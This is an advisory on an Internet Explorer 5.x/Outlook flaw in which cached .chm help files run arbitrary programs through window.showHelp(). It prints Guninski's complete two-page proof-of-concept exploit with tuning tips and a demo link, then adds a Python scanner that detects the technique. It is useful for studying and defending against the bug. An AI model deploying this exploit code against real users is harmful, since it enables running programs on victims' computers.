COMMAND

    IE

SYSTEMS AFFECTED

    IE 5.x/Outlook

PROBLEM

    The following is based on Georgi Guninski's security advisory #28.
    IE 5.x/Outlook allows executing arbitrary programs using .chm files
    and the temporary internet files folder.

    There is a security vulnerability in IE 5.5/Outlook/Outlook Express
    which allows executing arbitrary programs using .chm files and
    revealing the location of the temporary internet files folder. This
    may lead to taking full control over the user's computer.

    Georgi reported a similar vulnerability regarding .chm files some
    time ago, and Microsoft fixed it by allowing .chm files to run
    programs only if the .chm was loaded from the local file system.
    But it is still possible to find the temporary internet files
    folder, even though there are several such folders with random
    names.

    The following HTML code:

        <OBJECT DATA="http://SOMEHOST.COM/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200>

    where SOMEHOST.COM is a web server or alias that is different from
    the web server from which the HTML page is loaded, may reveal one of
    the temporary internet files folders through document.URL. Once a
    temporary internet files folder name is known, it is possible to
    cache a .chm in any temporary internet files folder and then use
    window.showHelp() to execute it.

    There are other ways to execute programs once a temporary internet
    files folder is known and a document is cached in it, but showHelp()
    seems to be the simplest. If the demonstration does not work, wait a
    minute and reload the page, or increase the number of "chm*.chm"
    files in <IMG> and showHelp(), or increase the time to wait if it is
    insufficient to download the chm files.

    The code is:

    ---------chmtempmain.html------------------------------------------
    <IMG SRC="chm1.chm" WIDTH=1 HEIGHT=1>
    <IMG SRC="chm2.chm" WIDTH=1 HEIGHT=1>
    <IMG SRC="chm3.chm" WIDTH=1 HEIGHT=1>
    <IMG SRC="chm4.chm" WIDTH=1 HEIGHT=1>
    <IMG SRC="chm5.chm" WIDTH=1 HEIGHT=1>
    <IMG SRC="chm6.chm" WIDTH=1 HEIGHT=1>
    <IMG SRC="chm7.chm" WIDTH=1 HEIGHT=1>
    <IMG SRC="chm8.chm" WIDTH=1 HEIGHT=1>
    <IMG SRC="chm9.chm" WIDTH=1 HEIGHT=1>
    <IMG SRC="chm10.chm" WIDTH=1 HEIGHT=1>
    <BR>
    The object  below must  be loaded  from a  server with  name different
    from the parent document  - it may be  the same server but  use the IP
    address or another alias.
    <BR>
    If this does not work try  increasing the number of "chm*.chm" in  IMG
    and showHelp.
    <BR>
    <OBJECT DATA="http://guninski.com/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200>
    ---------------------------------------------------------------------
    --------chmtemp.html-------------------------------------------------
    <SCRIPT>
    function g()
    {
    s=document.URL;
    path=s.substr(0,s.lastIndexOf("\\"));
    path=unescape(path);
    alert("One of your temp files directory is: "+path);
    window.showHelp(path+"\\chm1[1].chm");
    window.showHelp(path+"\\chm2[1].chm");
    window.showHelp(path+"\\chm3[1].chm");
    window.showHelp(path+"\\chm4[1].chm");
    window.showHelp(path+"\\chm5[1].chm");
    window.showHelp(path+"\\chm6[1].chm");
    window.showHelp(path+"\\chm7[1].chm");
    window.showHelp(path+"\\chm8[1].chm");
    window.showHelp(path+"\\chm9[1].chm");
    window.showHelp(path+"\\chm10[1].chm");
    
    }
    setTimeout("g()",5000); // if you are on a slow internet connection you must increase the delay
    </SCRIPT>
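    As an added example, not part of Guninski's advisory or his PoC, the
    following Python check scans a fetched HTML document for the two
    halves of this technique: a loader page that caches .chm files as
    images and frames a text/html OBJECT from another host, and a trigger
    page that derives a path from document.URL and passes it to
    showHelp(). The scanner is assumed to know the host the page came
    from; the sample documents are constructed and use documentation
    addresses.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the advisory's two-page PoC: .chm files pulled in as
# 1x1 images, a text/html OBJECT loaded from a different host, document.URL
# parsed for a local cache path, and window.showHelp() called on that path.
IMG_CHM_RE = re.compile(r'<IMG\b[^>]*\bSRC\s*=\s*["\']?([^"\'\s>]+\.chm)', re.I)
OBJECT_TAG_RE = re.compile(r'<OBJECT\b[^>]*>', re.I)
SHOWHELP_RE = re.compile(r'\bshowHelp\s*\(')
DOC_URL_RE = re.compile(r'\bdocument\.URL\b')

def _foreign_html_objects(html, page_host):
    """DATA URLs of text/html OBJECTs whose host differs from page_host."""
    found = []
    for tag in OBJECT_TAG_RE.findall(html):
        data = re.search(r'\bDATA\s*=\s*["\']?([^"\'\s>]+)', tag, re.I)
        is_html = re.search(r'\bTYPE\s*=\s*["\']?text/html', tag, re.I)
        if data and is_html:
            host = (urlparse(data.group(1)).hostname or '').lower()
            if host != page_host.lower():
                found.append(data.group(1))
    return found

def scan_html(html, page_host):
    """Report which stage of the .chm cache attack a document resembles."""
    chm_images = IMG_CHM_RE.findall(html)
    foreign = _foreign_html_objects(html, page_host)
    showhelp_calls = len(SHOWHELP_RE.findall(html))
    uses_document_url = bool(DOC_URL_RE.search(html))
    # Loader stage: caches .chm files and frames a cross-host document.
    # Trigger stage: derives a local path from document.URL and opens a .chm.
    loader_stage = bool(chm_images) and bool(foreign)
    trigger_stage = uses_document_url and showhelp_calls > 0
    return {"chm_images": chm_images, "foreign_html_objects": foreign,
            "showhelp_calls": showhelp_calls, "uses_document_url": uses_document_url,
            "loader_stage": loader_stage, "trigger_stage": trigger_stage,
            "suspicious": loader_stage or trigger_stage}

# Constructed samples (documentation hosts, not real sites).
LOADER_SAMPLE = ('<IMG SRC="chm1.chm" WIDTH=1 HEIGHT=1><IMG SRC="chm2.chm" WIDTH=1 HEIGHT=1>'
                 '<OBJECT DATA="http://198.51.100.7/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200>')
TRIGGER_SAMPLE = (r'<SCRIPT>s=document.URL;path=unescape(s.substr(0,s.lastIndexOf("\\")));'
                  r'window.showHelp(path+"\\chm1[1].chm");window.showHelp(path+"\\chm2[1].chm");</SCRIPT>')
BENIGN_SAMPLE = '<IMG SRC="logo.gif"><OBJECT DATA="http://www.example.net/widget.html" TYPE="text/html">'
if __name__ == "__main__":
    for name, page, host in (("loader", LOADER_SAMPLE, "www.example.net"),
                             ("trigger", TRIGGER_SAMPLE, "198.51.100.7"),
                             ("benign", BENIGN_SAMPLE, "www.example.net")):
        print(name, scan_html(page, host))
```

    A match on either half alone is worth flagging at a content filter,
    since the two pages are served from different hosts by design.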

    Demonstration is available at:

        http://www.guninski.com/chmtempmain.html

SOLUTION

    Disable Active Scripting.